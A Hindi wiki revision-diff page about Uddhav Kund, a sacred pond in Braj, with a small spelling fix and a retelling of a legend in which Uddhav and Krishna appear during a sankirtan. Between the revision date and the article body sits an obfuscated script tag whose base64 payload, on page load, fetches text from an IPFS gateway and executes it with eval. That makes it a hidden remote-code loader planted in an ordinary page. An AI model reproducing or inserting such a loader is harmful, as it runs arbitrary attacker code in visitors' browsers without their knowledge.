"उद्धव कुण्ड" के अवतरणों में अंतर

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ
पंक्ति ५: पंक्ति ५:
 
*[[वज्रनाभ]] महाराज ने [[शाण्डिल्य]] आदि ऋषियों के आनुगत्य में यहाँ उद्धव कुण्ड का प्रकाश किया ।  
 
*[[वज्रनाभ]] महाराज ने [[शाण्डिल्य]] आदि ऋषियों के आनुगत्य में यहाँ उद्धव कुण्ड का प्रकाश किया ।  
 
*उद्धव जी यहाँ पास में ही [[गोपी|गोपियों]] की चरणधूलि में अभिषिक्त होने के लिए तृण–गुल्म के रूप में सर्वदा निवास करते हैं  ।  
 
*उद्धव जी यहाँ पास में ही [[गोपी|गोपियों]] की चरणधूलि में अभिषिक्त होने के लिए तृण–गुल्म के रूप में सर्वदा निवास करते हैं  ।  
*श्री [[कृष्ण]] लीला अप्रकट होने पर कृष्ण की [[द्वारका]] वाली पटरानियाँ बड़ी दु:खी थीं । एक बार वज्रनाभ जी उनको साथ लेकर यहाँ उपस्थित हुए । बड़े जोरों से सक्ङीर्तन आरम्भ हुआ । देखते–देखते उस महासक्ङीर्तन में कृष्ण के सभी परिकर क्रमश: आविर्भूत होने लगे ।  [[अर्जुन]] मृदंग वादन करते हुए नृत्य करने लगे । इस प्रकार द्वारका के सभी परिकर उस संकीर्तन मण्डल में नृत्य और कीर्तन करने लगे । हठात महाभागवत उद्धव भी वहाँ के तृण गुल्म से आविर्भूत होकर नृत्य में विभोर हो गये । फिर भला कृष्ण ही कैसे रह सकते थे ? [[राधा|राधिका]] आदि सखियों के साथ वे भी उस महासंकीर्तन रास में आविर्भूत हो गये । थोड़ी देर के बाद ही वे अन्तर्ध्यान हो गये ।  
+
*श्री [[कृष्ण]] लीला अप्रकट होने पर कृष्ण की [[द्वारका]] वाली पटरानियाँ बड़ी दु:खी थीं । एक बार वज्रनाभ जी उनको साथ लेकर यहाँ उपस्थित हुए । बड़े जोरों से संकीर्तन आरम्भ हुआ । देखते–देखते उस महासंकीर्तन में कृष्ण के सभी परिकर क्रमश: आविर्भूत होने लगे ।  [[अर्जुन]] मृदंग वादन करते हुए नृत्य करने लगे । इस प्रकार द्वारका के सभी परिकर उस संकीर्तन मण्डल में नृत्य और कीर्तन करने लगे । हठात महाभागवत उद्धव भी वहाँ के तृण गुल्म से आविर्भूत होकर नृत्य में विभोर हो गये । फिर भला कृष्ण ही कैसे रह सकते थे ? [[राधा|राधिका]] आदि सखियों के साथ वे भी उस महासंकीर्तन रास में आविर्भूत हो गये । थोड़ी देर के बाद ही वे अन्तर्ध्यान हो गये ।  
 
*उद्धव जी ने द्वारका की महिषियों को यहीं पर सांत्वना दी थी ।
 
*उद्धव जी ने द्वारका की महिषियों को यहीं पर सांत्वना दी थी ।
  

१०:२०, १० नवम्बर २००९ का अवतरण

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

उद्धव कुण्ड / Uddhav Kund

  • कुसुम सरोवर के ठीक पश्चिम में परिक्रमा मार्ग पर दाहिनी ओर उद्धव कुण्ड है ।
  • स्कन्द पुराण के श्रीमद्भागवत–माहात्म्य प्रसंग में इसका बड़ा ही रोचक वर्णन है ।
  • वज्रनाभ महाराज ने शाण्डिल्य आदि ऋषियों के आनुगत्य में यहाँ उद्धव कुण्ड का प्रकाश किया ।
  • उद्धव जी यहाँ पास में ही गोपियों की चरणधूलि में अभिषिक्त होने के लिए तृण–गुल्म के रूप में सर्वदा निवास करते हैं ।
  • श्री कृष्ण लीला अप्रकट होने पर कृष्ण की द्वारका वाली पटरानियाँ बड़ी दु:खी थीं । एक बार वज्रनाभ जी उनको साथ लेकर यहाँ उपस्थित हुए । बड़े जोरों से संकीर्तन आरम्भ हुआ । देखते–देखते उस महासंकीर्तन में कृष्ण के सभी परिकर क्रमश: आविर्भूत होने लगे । अर्जुन मृदंग वादन करते हुए नृत्य करने लगे । इस प्रकार द्वारका के सभी परिकर उस संकीर्तन मण्डल में नृत्य और कीर्तन करने लगे । हठात महाभागवत उद्धव भी वहाँ के तृण गुल्म से आविर्भूत होकर नृत्य में विभोर हो गये । फिर भला कृष्ण ही कैसे रह सकते थे ? राधिका आदि सखियों के साथ वे भी उस महासंकीर्तन रास में आविर्भूत हो गये । थोड़ी देर के बाद ही वे अन्तर्ध्यान हो गये ।
  • उद्धव जी ने द्वारका की महिषियों को यहीं पर सांत्वना दी थी ।


साँचा:कुण्ड